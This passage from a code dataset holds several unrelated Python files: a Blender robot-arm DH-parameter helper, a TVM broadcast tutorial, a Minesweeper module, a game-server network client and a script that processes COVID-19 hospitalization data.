n):\n return n * ((v * n) / (n.magnitude * n.magnitude))\n\n\n# 返回关节 jointN 的z轴射线表达式\n# 线段的射线表示法:\n# r(t) = p + td\n# t = 0~1\ndef zAxes(jointN):\n if isinstance(jointN,str) :\n link = bpy.context.scene.objects[jointN]\n # 坐标系n 对应 关节n+1\n else:\n link = bpy.context.scene.objects[\"link\" + str(jointN)]\n p = link.matrix_world * Vector((0, 0, 0))\n d = link.matrix_world * Vector((0, 0, 50)) - p\n return (p, d)\n\n# 按照坐标系前置设定,测定 固连到各个关节的相对坐标系\ndef measurePreposingFrame(jointIdx):\n\n # 坐标系n 对应 关节n+1\n cosysN = joints_cosys[jointIdx]\n\n # 关节n 和 关节n+1 的z轴射线表达式参数\n (pN, dN) = zAxes(jointIdx)\n (pNext, dNext) = zAxes(jointIdx+1)\n\n # 计算前后z轴的公垂线\n (hN, hNext, hDirection) = commonPerpendicular(pN,dN, pNext, dNext)\n\n\n # 没有共垂线,两轴平行或重叠\n if hN==None and hNext==None :\n\n # n关节的坐标,可以时 n+1 z轴上的任意位置\n cosysN[\"O\"] = pN\n\n # 两z轴共线(重叠)\n dNP = pNext - pN\n if abs(dNP.dot(dN)-dNP.magnitude * dN.magnitude) < 0.001:\n cosysN[\"H\"] = cosysN[\"O\"]\n cosysN[\"x-unit\"] = bpy.context.scene.objects[\"link\" + str(jointIdx)].matrix_world * Vector((50,0,0)) # 取世界坐标系的x轴方向\n # 两z轴平行\n else :\n cosysN[\"H\"] = projection(pN-pNext, dNext) + pNext\n cosysN[\"x-unit\"] = 50 * normalize(cosysN[\"H\"]-cosysN[\"O\"]) + cosysN[\"O\"]\n\n # 存在公垂线\n else :\n # 按照DH模型的约定,关节n 的原点,在关节n+1的 z轴上\n cosysN[\"O\"] = hN\n cosysN[\"H\"] = hNext\n cosysN[\"x-unit\"] = 50 * normalize(hDirection) + cosysN[\"O\"]\n\n # z轴\n cosysN[\"z-unit\"] = 50 * normalize(dN) + cosysN[\"O\"]\n\ndef measurePreposingDHConst(jointIdx):\n\n jointDHParam = getattr(bpy.context.scene, \"joint\"+str(jointIdx)+\"_DH\")\n cosysN = joints_cosys[jointIdx]\n cosysPre = joints_cosys[jointIdx-1]\n\n # 参数a\n jointDHParam[0] = (cosysN[\"O\"] - cosysN[\"H\"]).magnitude\n\n # 参数alpha\n if (jointIdx+1) in joints_cosys :\n cosysNext = joints_cosys[jointIdx+1]\n jointDHParam[1] = linesAngle(cosysN[\"z-unit\"]-cosysN[\"O\"], cosysNext[\"z-unit\"]-cosysNext[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"])\n else :\n # 按习惯 α6 = 0\n jointDHParam[1] = 0\n\n # 参数d\n jointDHParam[2] = (cosysN[\"O\"]-cosysPre[\"H\"]).magnitude\n # 根据和z轴的方向,确定正负\n if abs(jointDHParam[2])>0.001 :\n if (cosysN[\"O\"] - cosysPre[\"H\"]).dot( cosysN[\"z-unit\"]-cosysN[\"O\"] ) < 0 :\n jointDHParam[2] = -jointDHParam[2]\n\n # 参数theta\n jointDHParam[3] = linesAngle(cosysPre[\"x-unit\"]-cosysPre[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"], cosysN[\"z-unit\"]-cosysN[\"O\"])\n\n return\n\n\n\n\n# 按照坐标系后置设定,测定 DH参数模型中的常量值: a, alpha, d\ndef measurePostposingFrame(cosysIdx):\n\n # 坐标系n 对应 关节n+1\n cosysN = joints_cosys[cosysIdx]\n\n # 坐标系n 和 坐标系n-1 的z轴射线表达式参数\n (pN, dN) = zAxes(cosysIdx+1)\n (pPre, dPre) = zAxes(cosysIdx)\n\n # 计算前后z轴的公垂线\n (hN, hPre, hDirection) = commonPerpendicular(pN,dN, pPre, dPre)\n\n # 没有共垂线,两轴平行或重叠\n if hN==None and hPre==None :\n\n # n关节的坐标,可以时 n+1 z轴上的任意位置\n cosysN[\"O\"] = pN\n\n # 两z轴共线(重叠)\n dNP = pN - pPre\n if abs(dNP.dot(dN)-dNP.magnitude * dN.magnitude) < 0.005:\n cosysN[\"H\"] = cosysN[\"O\"]\n linkNext = bpy.context.scene.objects[\"link\" + str(cosysIdx+1)]\n linkX = linkNext.matrix_world * Vector((50, 0, 0)) - linkNext.matrix_world * Vector((0, 0, 0))\n cosysN[\"x-unit\"] = linkX + cosysN[\"O\"] # 和连杆的x轴一致\n # 两z轴平行\n else :\n cosysN[\"H\"] = projection(pN-pPre, dPre) + pPre\n cosysN[\"x-unit\"] = 50 * normalize(cosysN[\"O\"]-cosysN[\"H\"]) + cosysN[\"O\"]\n\n # 存在公垂线\n else :\n # 按照DH模型的约定,关节n 的原点,在关节n+1的 z轴上\n cosysN[\"O\"] = hN\n cosysN[\"H\"] = hPre\n cosysN[\"x-unit\"] = -50 * normalize(hDirection) + cosysN[\"O\"]\n\n # z轴\n cosysN[\"z-unit\"] = 50 * normalize(dN) + cosysN[\"O\"]\n\n\n# 后置坐标系的 DH参数测定\ndef measurePostposingDHConst(jointN):\n\n jointDHParam = getattr(bpy.context.scene, \"joint\"+str(jointN)+\"_DH\")\n\n cosysPre = joints_cosys[jointN-1]\n cosysN = joints_cosys[jointN]\n\n # 参数a\n jointDHParam[0] = (cosysN[\"O\"] - cosysN[\"H\"]).magnitude\n\n # 参数alpha\n jointDHParam[1] = linesAngle(cosysPre[\"z-unit\"]-cosysPre[\"O\"], cosysN[\"z-unit\"]-cosysN[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"])\n\n # 参数d\n jointDHParam[2] = (cosysN[\"H\"]-cosysPre[\"O\"]).magnitude\n\n # 根据和z轴的方向,确定正负\n if abs(jointDHParam[2])>0.001 :\n if (cosysN[\"H\"]-cosysPre[\"O\"]).dot( cosysPre[\"z-unit\"]-cosysPre[\"O\"] ) < 0 :\n jointDHParam[2] = -jointDHParam[2]\n\n # 参数theta\n jointDHParam[3] = linesAngle(cosysPre[\"x-unit\"]-cosysPre[\"O\"], cosysN[\"x-unit\"]-cosysN[\"O\"], cosysPre[\"z-unit\"]-cosysPre[\"O\"])\n\n return\n\n\ndef drawJointDHGuide(jointIdx):\n\n o = joints_cosys[jointIdx][\"O\"]\n h = joints_cosys[jointIdx][\"H\"]\n\n # 画两根线,o-p1 和 o-p2 共线,先画长的那一根,以免短的被盖住\n def drawTwoLine (pa1,pb1,color1, pa2,pb2,color2) :\n if (pb1-pa1).magnitude > (pa2-pb2).magnitude :\n line(pa1,pb1, color1)\n line(pa2,pb2, color2)\n else:\n line(pa2,pb2, color2)\n line(pa1,pb1, color1)\n\n # line a 和 x axes\n drawTwoLine(o, joints_cosys[jointIdx][\"H\"],\"DH-a\", o, joints_cosys[jointIdx][\"x-unit\"],\"x-axes\")\n\n # line d 和 z axes\n if isPreposing() :\n drawTwoLine(o, joints_cosys[jointIdx - 1][\"H\"], \"DH-d\", o, joints_cosys[jointIdx][\"z-unit\"], \"z-axes\")\n else :\n if jointIdx+1 in joints_cosys :\n drawTwoLine(h, joints_cosys[jointIdx - 1][\"O\"], \"DH-d\", o, joints_cosys[jointIdx][\"z-unit\"], \"z-axes\")\n else:\n line(o, joints_cosys[jointIdx][\"z-unit\"], \"z-axes\")\n\n\n# 重建 DH 模型\ndef measureDHModel(context):\n\n objecst = context.scene.objects\n\n for idx in range(1,7) :\n DHParam = getattr(context.scene, \"joint\"+str(idx)+\"_DH\")\n axesX = objecst[\"x\"+str(idx)]\n axesZ = objecst[\"z\"+str(idx)]\n # d\n DHParam[1] = axesX.location.z\n # a\n DHParam[2] = axesX.location.x\n # Alpha\n DHParam[3] = axesZ.rotation_euler.x/math.pi*180\n\n # update jotin variable Theta\n updateTheta(context)\n\n\ndef updateTheta(context) :\n objecst = context.scene.objects\n for idx in range(1,7) :\n frame = objecst[\"frame\"+str(idx)]\n DHParam = getattr(context.scene, \"joint\"+str(idx)+\"_DH\")\n DHParam[0] = frame.rotation_euler.z/math.pi*180\n\n\n\n# 根据 DH 模型移动 各个关节坐标\ndef applyDHModel(context) :\n\n for jointN in range(1,7) :\n\n params = getattr(context.scene,\"joint\"+str(jointN)+\"_DH\")\n\n theta = params[0]\n d = params[1]\n a = params[2]\n alpha = params[3]\n\n frameN = context.scene.objects[\"frame\"+str(jointN)]\n frameN.location = Vector((0,0,0))\n frameN.rotation_euler = Euler((0,0,radians(theta)))\n\n xN = context.scene.objects[\"x\"+str(jointN)]\n xN.location = Vector((a,0,d))\n\n zN = context.scene.objects[\"z\"+str(jointN)]\n zN.rotation_euler = Euler((radians(alpha),0,0))\n\n return\n\n\ndef setJoints(q) :\n for i in range(len(q)):\n params = getattr(bpy.context.scene,\"joint\"+str(i+1)+\"_DH\")\n params[0] = q[i]/math.pi * 180\n\n setattr(bpy.context.scene,\"joint\"+str(i+1)+\"_value\", params[0])\n \n applyDHModel(bpy.context)\n\n\ndef formatMatrix(m) :\n txt = \"Matrix([\\n\"\n for row in range(0, len(m)):\n txt += \" [\"\n for clm in range(0, len(m[row])):\n try:\n if abs(float(m[row][clm]))<0.001 :\n txt += \"0, \"\n elif abs(1-float(m[row][clm]))<0.001 :\n txt += \"1, \"\n else :\n txt += str(m[row][clm]) + \", \"\n except :\n txt += str(m[row][clm]) + \", \"\n txt += \"], \\n\"\n txt += \"])\"\n return txt\n\ndef outputDHEquation():\n\n codetpl = \"\"\"\nfrom sympy import *\n\nθ1 = Symbol(\"θ1\")\nθ2 = Symbol(\"θ2\")\nθ3 = Symbol(\"θ3\")\nθ4 = Symbol(\"θ4\")\nθ5 = Symbol(\"θ5\")\nθ6 = Symbol(\"θ6\")\n\nsimplify( \"\"\"\n exp = [\n [ \"cos(θ)\", \"-sin(θ) * cos(α)\", \"sin(θ) * sin(α)\", \"a * cos(θ)\"] ,\n [ \"sin(θ)\", \"cos(θ) * cos(α)\", \"-cos(θ) * sin(α)\", \"a * sin(θ)\"] ,\n [ \"0\", \"sin(α)\", \"cos(α)\", \"d\"] ,\n [ \"0\", \"0\", \"0\", \"1\"]\n ]\n\n # 简化代数式\n def simplify(e, dh) :\n e = e.replace(\"θ\", \"θ\" + str(joint))\n # 参数 a=0 or d=0\n if dh[0] < 0.001 or dh[2] < 0.001:\n if e.find(\"d\")>=0 or e.find(\"a\")>=0 :\n return \"0\"\n # 参数 α=90\n if 90 - dh[1] < 0.01:\n if e.find(\"cos(α)\") > -1:\n return \"0\"\n e = e.replace(\" * sin(α)\", \"\")\n e = e.replace(\"sin(α)\", \"1\")\n\n # 参数 α=0\n if dh[1] < 0.01:\n if e.find(\"sin(α)\") > -1:\n return \"0\"\n e = e.replace(\" * cos(α)\", \"\")\n e = e.replace(\"cos(α)\", \"1\")\n\n e = e.replace(\"a\", str(dh[0]))\n e = e.replace(\"d\", str(dh[2]))\n\n return e\n\n\n for joint in range(1,7) :\n jointDHParam = getattr(bpy.context.scene, \"joint\" + str(joint) + \"_DH\")\n m = [[\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\"],[\"\",\"\",\"\",\"\"]]\n for row in range(len(exp)) :\n for clm in range(len(exp[row])) :\n m[row][clm] = simplify( exp[row][clm], jointDHParam )\n\n if joint>1 :\n codetpl+= \" * \"\n codetpl+= formatMatrix(m)\n\n codetpl+=\" ) \\n\"\n output(codetpl)\n\n #\n # for idx in range(1,7) :\n # jointDHParam = getattr(bpy.context.scene, \"joint\" + str(idx) + \"_DH\")\n # codetpl = codetpl.replace(\"a\"+str(idx), str(jointDHParam[0]))\n # codetpl = codetpl.replace(\"α\"+str(idx), str(jointDHParam[1]))\n # codetpl = codetpl.replace(\"d\"+str(idx), str(jointDHParam[2]))\n #\n # output(codetpl)\n\n","repo_name":"aleechou/blender-robot-arm-simulator","sub_path":"DH_helper.py","file_name":"DH_helper.py","file_ext":"py","file_size_in_byte":15002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21131613338","text":"import tvm\nimport numpy as np\n\ndef broadcast_add(shape1, shape2):\n assert len(shape1) == 2 and len(shape2) == 2\n for i in range(len(shape1)):\n assert shape1[i] == shape2[i] or shape1[i] == 1 or shape2[i] == 1\n A = tvm.placeholder(shape1, name='A')\n B = tvm.placeholder(shape2, name='B')\n m = shape1[0] if shape2[0] == 1 else shape2[0]\n n = shape1[1] if shape2[1] == 1 else shape2[1]\n\n def f(x, y):\n # the type of `x` is `tvm.expr.Var`\n # the type of shape is a list of int\n ai = 0 if shape1[0] == 1 else x\n aj = 0 if shape1[1] == 1 else y\n\n bi = 0 if shape2[0] == 1 else x\n bj = 0 if shape2[1] == 1 else y\n\n return A[ai, aj] + B[bi, bj]\n C = tvm.compute((m, n), f, name='C') \n return A, B, C\n\nm, n = 3, 4\nshape1 = (m, 1)\nshape2 = (m, n)\nA, B, C = broadcast_add(shape1, shape2)\ns = tvm.create_schedule(C.op)\nprint(tvm.lower(s, [A, B], simple_mode=True))\n\nmod = tvm.build(s, [A, B, C])\n\ndef get_bcast_data(shape1, shape2, constructor=None):\n \"\"\"Return random tensors a, b\n and empty tensor c to store broadcast results between a and b\n\n shape1, shape2: shapes of input tensors\n constructor : user-defined tensor constructor\n \"\"\"\n np.random.seed(0)\n a = np.random.normal(size=shape1).astype(\"float32\")\n b = np.random.normal(size=shape2).astype(\"float32\")\n out_shape = (shape1[0] if shape2[0] == 1 else shape2[0],\n shape1[1] if shape2[1] == 1 else shape2[1])\n c = np.empty(out_shape, dtype='float32')\n if constructor:\n a, b, c = [constructor(x) for x in (a, b, c)]\n return a, b, c\n\na, b, c = get_bcast_data(shape1, shape2, tvm.nd.array)\nmod(a, b, c)\n\nnp.testing.assert_allclose(np.add(a.asnumpy(), b.asnumpy()), c.asnumpy(), atol=1e-5)\nprint(a.shape, b.shape, c.shape)\n","repo_name":"wkcn/learning_tvm","sub_path":"3.common_operators/3.1.broadcast_add.py","file_name":"3.1.broadcast_add.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"44414063771","text":"from settings import *\n\nimport random\n\nfj = [\n (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0),\n]\n\n\nclass Ge:\n def __init__(self, pos):\n self.come = False\n self.pos = pos\n self.line = [\n [(pos[0], pos[1]), (pos[0] + length, pos[1])],\n [(pos[0], pos[1]), (pos[0], pos[1] + length)],\n [(pos[0], pos[1] + length), (pos[0] + length, pos[1] + length)],\n [(pos[0] + length, pos[1]), (pos[0] + length, pos[1] + length)]\n ]\n\n self.fj_pos = []\n\n self.num = \"0\"\n self.print = self.num\n self.status = 0\n self.weeper = False\n\n self.get_fj_pos()\n\n def get_fj_pos(self):\n for _fj in fj:\n c_x = self.pos[0] + _fj[0] * length\n c_y = self.pos[1] + _fj[1] * length\n\n if not (c_x < 0 or c_y < 0 or c_x >= max_width or c_y >= max_height):\n self.fj_pos.append(f\"{c_x}-{c_y}\")\n\n def for_screen(self):\n # 绘制矩形\n rect = (self.pos[0] + 1, self.pos[1] + 1, length - 1, length - 1)\n pygame.draw.rect(screen, \"#98F5FF\", rect, width=0)\n\n # 绘制附近地雷数量\n if self.num in \"12345678\" or True:\n surface = font.render(self.print, False, \"#8B0000\")\n screen.blit(surface, (self.pos[0] + length // 4, self.pos[1]))\n\n def del_for_screen(self):\n # 绘制矩形\n rect = (self.pos[0] + 1, self.pos[1] + 1, length - 1, length - 1)\n pygame.draw.rect(screen, \"black\", rect, width=0)\n\n\n# 设置地雷\ndef set_weeper(ge_lis: dict):\n pos_lis = list(ge_lis.keys())\n\n for _ in range(len(pos_lis) // 6):\n new_wp_index = random.randint(0, len(pos_lis) - 1)\n new_wp_pos = pos_lis.pop(new_wp_index)\n ge_lis[new_wp_pos].weeper = True\n ge_lis[new_wp_pos].num = \"!\"\n ge_lis[new_wp_pos].print = \"!\"\n weeper_lis.append(new_wp_pos)\n\n\n# 设置所有格子周围地雷数\ndef get_num(ge_lis: dict):\n for pos, ge in ge_lis.items():\n if ge.weeper:\n continue\n\n num = 0\n for c_pos in ge.fj_pos:\n c_ge = ge_lis.get(c_pos)\n if c_ge and c_ge.weeper:\n num += 1\n\n ge.num = str(num)\n ge.print = str(num)\n\n\n# 翻雷\ndef click_weeper(pos: str, ge_lis: dict):\n cur_ge = ge_lis.get(pos)\n\n if cur_ge.status != 0:\n return\n\n if cur_ge.num == \"0\":\n cur_ge.status = 1\n\n for _ge_pos in cur_ge.fj_pos:\n click_weeper(_ge_pos, ge_lis)\n\n elif cur_ge.num in \"12345678\":\n cur_ge.status = 1\n\n elif cur_ge.num == \"!\":\n GLOBAL_VUL[\"over\"] = True\n\n cur_ge.for_screen()\n\n\n# 插旗\ndef this_is_weeper(pos: str, ge_lis: dict):\n cur_ge = ge_lis.get(pos)\n\n if cur_ge.status == 0:\n cur_ge.status = 2\n cur_ge.print = \"*\"\n\n if pos in weeper_lis and cur_ge.weeper:\n weeper_lis.remove(pos)\n\n is_weeper_lis.append(pos)\n cur_ge.for_screen()\n elif cur_ge.status == 1:\n return\n elif cur_ge.status == 2:\n cur_ge.status = 0\n cur_ge.print = cur_ge.num\n\n if pos not in weeper_lis:\n weeper_lis.append(pos)\n\n is_weeper_lis.remove(pos)\n cur_ge.del_for_screen()\n","repo_name":"wisdomowl704/PyOr","sub_path":"Minesweeper/weeper.py","file_name":"weeper.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72568451961","text":"import threading\nimport urllib\nimport urllib.parse\nimport urllib.error\nimport urllib.request\nimport urllib.response\nimport json\nimport time\nimport os\n\"\"\"\nMethod to add a new TODO file with command in it\n\"\"\"\ndef addCommandToQueue(command):\n\tfileName = os.getcwd() + \"/TODO/task_queue_\" + str(time.time())\n\tf = open(fileName,\"w\")\n\tf.write(command)\n\tf.close()\n\ndef addCommandsToQueue(commands):\n\tfileName = os.getcwd() + \"/TODO/task_queue_\" + str(time.time())\n\tf = open(fileName,\"w\")\n\tfor command in commands:\n\t\tf.write(command)\n\tf.close()\n\t\n\nclass NetworkHandler(threading.Thread):\n\tdef __init__(self,url,password):\n\t\tthreading.Thread.__init__(self)\n\t\tself._commands = []\n\t\tself._url = url\n\t\tself._password = password\n\t\tself._running = False\n\t\tself._userdata = {}\n\t\tself._splitter = \"/%%:\"\n\t\n\tdef run(self):\n\t\tself._running = True\n\t\t#Long poll for updates\n\t\twhile self._running:\n\t\t\ttry:\n\t\t\t\tupdates = self.post({'command':'getUpdates'})\n\t\t\t\tjdata = json.loads(updates)\n\t\t\t\tfor update in jdata:\n\t\t\t\t\tself._commands.append(update['command'].strip())\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\ttime.sleep(3)\n\n\tdef post(self,rawData):\n\t\t\trawData['password'] = self._password\n\t\t\tdata = json.dumps(rawData)\n\t\t\turl = urllib.request.Request(self._url,data.encode())\n\t\t\turl.add_header(\"Content-Type\",\"application/json\")\n\t\t\tdata = urllib.request.urlopen(url, timeout=10).read().decode('utf8', 'ignore')\n\t\t\treturn data\n\tdef loadUserData(self):\n\t\tif os.path.exists(os.getcwd() + \"/userdata.txt\")==False:#Download if absent\n\t\t\tself.downloadUserData()\t\n\t\t#Load File\n\t\tf = open(os.getcwd() + \"/userdata.txt\",\"r\")\n\t\tline = f.readline()\n\t\twhile len(line) > 0:\n\t\t\tdetails = line.split(self._splitter)\n\t\t\tself._userdata[details[0]] = {'username':details[1],'studentnum':details[2],'cellphone':details[3]}\n\t\t\tline = f.readline()\n\t\tf.close()\n\n\tdef downloadUserData(self):\n\t\tuserDataJson = self.getUserData()\n\t\tuserMap = json.loads(userDataJson)\n\t\ttoWrite = \"\"\n\t\tfor user in userMap:\n\t\t\tif user != 'success':\n\t\t\t\tdetails = userMap[user]\n\t\t\t\ttoWrite += \"{1}{0}{2}{0}{3}{0}{4}\\n\".format(self._splitter,details['USERID'],details['USERNAME'],details['STUDENTNUMBER'],details['CELLNUMBER'])\n\t\tnewFile = open(os.getcwd() + \"/userdata.txt\",\"w\")\n\t\tnewFile.write(toWrite)\n\t\tnewFile.close()\n\n\tdef getUserDetail(self,userID,detail):\n\t\tif len(self._userdata) == 0:#Check if file loaded\n\t\t\tself.loadUserData()\n\t\tif not userID in self._userdata:#If user doesnt exist and old file then redownload\n\t\t\tself.downloadUserData()\n\t\tif not userID in self._userdata:#If user doesnt exist\n\t\t\treturn userID\n\t\telse:#User exists\n\t\t\treturn self._userdata[userID][detail]\n\n\tdef findValue(self,m,val,detail):\n\t\tfound = False\n\t\tfor key in m:\n\t\t\tif val in m[key][detail]:\n\t\t\t\tfound = True\n\t\treturn found\n\n\tdef findUserDetails(self,value,detail):\n\t\tif len(self._userdata) == 0:#Check if file loaded\n\t\t\tself.loadUserData()\n\t\tif not self.findValue(self._userdata,value,detail):#If user doesnt exist and old file then redownload\n\t\t\tself.downloadUserData()\n\t\tif not self.findValue(self._userdata,value,detail):#If user doesnt exist\n\t\t\treturn \"Unknown(\"+userID+\")\"\n\t\telse:#User exists\n\t\t\tfor key in self._userdata:\n\t\t\t\tif value in self._userdata[key][detail]:\n\t\t\t\t\treturn key\n\t\treturn 'unknown'\n\n\n\t\n\n\tdef getUsername(self,userID):\n\t\treturn self.getUserDetail(userID,'username')\n\tdef getCellphone(self,userID):\n\t\treturn self.getUserDetail(userID,'cellphone')\n\tdef getStudentNumber(self,userID):\n\t\treturn self.getUserDetail(userID,'studentnum')\n\tdef getUserIDByCell(self,cell):\n\t\treturn self.findUserDetails(cell,'cellphone')\n\tdef getLeaderboard(self,userID):\n\t\tdata = self.post({'command':'getLeaderboard'})\n\t\tjsondata = json.loads(data);\n\t\tif not jsondata['success']:\n\t\t\taddCommandToQueue(\"send~~\"+ self.sanitiseUserID(userID) +\"~~Could not load the leaderboard.\"\n\t\t\t+\" Try the website if the problem persists.\")\n\t\telse:\n\t\t\taddCommandToQueue(\"sendleaderboard~~\"+ userID +\"~~\" + data)\n\tdef sanitiseUserID(self,userID):\n\t\t\tif '+27' in userID:\n\t\t\t\tuserID = \"0\"+userID[3:]\n\t\t\t\tuserID = self.getUserIDByCell(userID)\n\t\t\tif userID == 'unknown':\n\t\t\t\tself.addCommandToQueue(\"send~~\"+ userID +\"~~Could not find your user code. Please use the website.\")\n\t\t\t\tuserID = 'a385cac'\n\t\t\treturn userID\n\n\tdef getStatus(self,userID):\n\t\tdata = self.post({'command':'getUserStatus','userID':self.sanitiseUserID(userID)})\n\t\tjsondata = json.loads(data);\n\t\tif jsondata['success'] != True:\n\t\t\taddCommandToQueue(\"send~~\"+ userID +\"~~Error: Could not get your details.\"\n\t\t\t+\" Try the website if the problem persists.\")\n\t\telse:\n\t\t\taddCommandToQueue(\"sendstatus~~\"+ userID +\"~~\"+data)\n\n\tdef getUserData(self):\n\t\treturn self.post({'command':'getUserData'})\n\t\n\tdef kill(self,userID, victimID):\n\t\tdata = self.post({'command':'kill','killerID':self.sanitiseUserID(userID),'victimID':self.sanitiseUserID(victimID)})\n\t\tjsondata = json.loads(data);\n\t\tif not jsondata['success']:\n\t\t\taddCommandToQueue(\"send~~\"+ userID +\"~~Could not kill that user.\"\n\t\t\t+jsondata['reason']\n\t\t\t+\". Try the website if the problem persists.\")\n\t\n\t\n\tdef claim(self,userID, claimID):\n\t\tdata = self.post({'command':'claim','userID':self.sanitiseUserID(userID),'code':claimID})\n\t\tjsondata = json.loads(data);\n\t\tif not jsondata['success']:\n\t\t\taddCommandToQueue(\"send~~\"+ userID +\"~~Your claim failed, \" + jsondata['reason']\n\t\t\t+\". Try claim it on the website if the problem persists.\")\n\n\tdef getLiving(self,userID):\n\t\tdata = self.post({'command':'getLiving'})\n\t\taddCommandToQueue(\"sendliving~~\"+ userID +\"~~\"+data)\n\t\n\tdef stop(self):\n\t\tself._running = False\n\n\tdef getCommands(self):\n\t\tret = self._commands\n\t\tself._commands = []\t\n\t\treturn ret\n\n\t\n\t\t\nif __name__ == '__main__':\n\tcfgFile = open(os.getcwd() + \"/Config.cfg\", \"r\")\n\tconfig = {}\n\tfor line in cfgFile:\n\t\tparts = line.strip().split(\"=\")\n\t\tconfig[parts[0]] = parts[1]\n\tnet = NetworkHandler(config['phpUrl'],config['phpPassword'])\n\tnet.start()\n\tprint(net.getUserIDByCell('845810628'))\n\t\n","repo_name":"lDisciple/MetaZombies","sub_path":"Mobile/networkHandler.py","file_name":"networkHandler.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73003850359","text":"from expression import *\nclass Regle:\n def __init__(self,id=0,premisses=[],conclusion=[],):\n self.id = None\n self.premisses = None\n self.conclusion = None\n def __str__(self):\n toReturn='id--'+str(self.id)+'--prem--'\n for prem in self.premisses :\n toReturn+=(prem+'--')\n toReturn+=('--conc--'+self.conclusion)\n return toReturn\n\nclass Fait:\n def __init__(self, fait=None):\n self.fait = fait\n","repo_name":"dhia-e-rzig/FwChainingNoConflict","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14558197464","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: karlen\n\"\"\"\nimport numpy as np\nimport datetime\nfrom datetime import timedelta\n\nt0 = datetime.date(2020,3,1)\n\nregional_abbreviations = {\n 'Austria': 'AT',\n 'Belgium': 'BE',\n 'Bulgaria': 'BG',\n 'Croatia': 'HR',\n 'Cyprus': 'CY',\n 'Czechia': 'CZ',\n 'Denmark': 'DK',\n 'Estonia': 'EE',\n 'Finland': 'FI',\n 'France': 'FR',\n 'Germany': 'DE',\n 'Greece': 'GR',\n 'Hungary': 'HU',\n 'Iceland': 'IS',\n 'Ireland': 'IE',\n 'Italy': 'IT',\n 'Latvia': 'LV',\n 'Liechtenstein': 'LI',\n 'Lithuania': 'LT',\n 'Luxembourg': 'LU',\n 'Malta': 'MT',\n 'Netherlands': 'NL',\n 'Norway': 'NO',\n 'Poland': 'PL',\n 'Portugal': 'PT',\n 'Romania': 'RO',\n 'Slovakia': 'SK',\n 'Slovenia': 'SI',\n 'Spain': 'ES',\n 'Sweden': 'SE',\n 'Switzerland': 'CH',\n 'United Kingdom': 'GB'\n}\n\n# Starting Nov 8 2021, multiple sources: daily scraped.csv, daily non-eu, weekly for remaining\ndata_by_state = {}\nlast_date_by_state = {}\n\n# Starting Oct 9 2022, ECDC data stale, use OWID repo and UK data to continue updating data\nowid_start_date = datetime.date(2022, 9, 4)\nowid_states = ['BE', 'FR', 'IE', 'NO', 'CH']\nuk_start_date = datetime.date(2022, 9, 4)\n\nraw_files = ['scraped.csv','non-eu.csv']\ndate_fields = [3,2]\nvalue_fields = [4,3]\n\nrecord_date = None\nfor j,raw_file in enumerate(raw_files):\n with open(raw_file) as f:\n for i,line in enumerate(f):\n if i > 0:\n fields = line.split(',')\n if j>0 or fields[2] == 'New_Hospitalised':\n df = fields[date_fields[j]].split('-')\n record_date = datetime.date(int(df[0]),int(df[1]),int(df[2]))\n state = fields[1]\n value = int(fields[value_fields[j]])\n\n if state not in data_by_state:\n data_by_state[state] = {}\n data_by_state[state][t0] = 0\n last_date_by_state[state] = t0\n if record_date <= t0:\n data_by_state[state][t0] += value\n else:\n data_by_state[state][record_date] = value\n if record_date > last_date_by_state[state]:\n last_date_by_state[state] = record_date\n\nprint('Daily hospitalization data taken in scraped.csv and non-eu.csv up to (last date):')\nraw_states = []\nbad_states = []\nfor state in data_by_state:\n print(state, last_date_by_state[state])\n #if raw data is out of date, do not use it\n if (datetime.date.today()-last_date_by_state[state]).days > 120:\n print(state,' ** raw data not used ** too old')\n bad_states.append(state)\n else:\n raw_states.append(state)\n\nfor state in bad_states:\n del data_by_state[state]\n del last_date_by_state[state]\n\n# use OWID data to fill in values, starting from owid_start_date\n# OWID is 7 day sum (typically updated daily) so that daily admissions can be extracted\n# Otherwise use weekly values to update\n\nowid_file = 'covid-hospitalizations.csv'\n\nlast_state = ''\nlast_date = ''\nseven_day_buffer = []\nwith open(owid_file) as f:\n for i, line in enumerate(f):\n if i > 0:\n fields = line.strip().split(',')\n if fields[3] == 'Weekly new hospital admissions':\n country = fields[0]\n if country in regional_abbreviations:\n state = regional_abbreviations[country]\n if state != last_state:\n seven_day_buffer = []\n last_state = state\n if state in owid_states:\n df = fields[2].split('-')\n record_date = datetime.date(int(df[0]), int(df[1]), int(df[2]))\n if record_date == owid_start_date:\n last_date = record_date\n seven_day_buffer = []\n for day_offset in range(-6,1,1):\n date = record_date + timedelta(days=day_offset)\n value = data_by_state[state][date]\n seven_day_buffer.append(value)\n elif record_date > owid_start_date:\n value = int(float(fields[4]))\n if (record_date-last_date).days == 1:\n new_admin = value - int(np.sum(seven_day_buffer[1:]))\n data_by_state[state][record_date] = new_admin\n seven_day_buffer = seven_day_buffer[1:] + [new_admin]\n last_date = record_date\n else:\n if len(seven_day_buffer) == 0:\n seven_day_buffer = []\n for day_offset in range(-6, 1, 1):\n date = record_date + timedelta(days=day_offset)\n value = data_by_state[state][date]\n seven_day_buffer.append(value)\n days = (record_date-last_date).days\n new_admin = value - np.sum(seven_day_buffer[days:])\n daily = int(new_admin / days)\n extra = new_admin % days\n for iday in range(days):\n date = record_date - timedelta(days=iday)\n data_by_state[state][date] = daily\n if iday < extra:\n data_by_state[state][date] += 1\n last_date = record_date\n\n if record_date > last_date_by_state[state]:\n last_date_by_state[state] = record_date\n\n# use weekly data for the rest: split across days of week\necdc_file = 'truth_ECDC-Incident 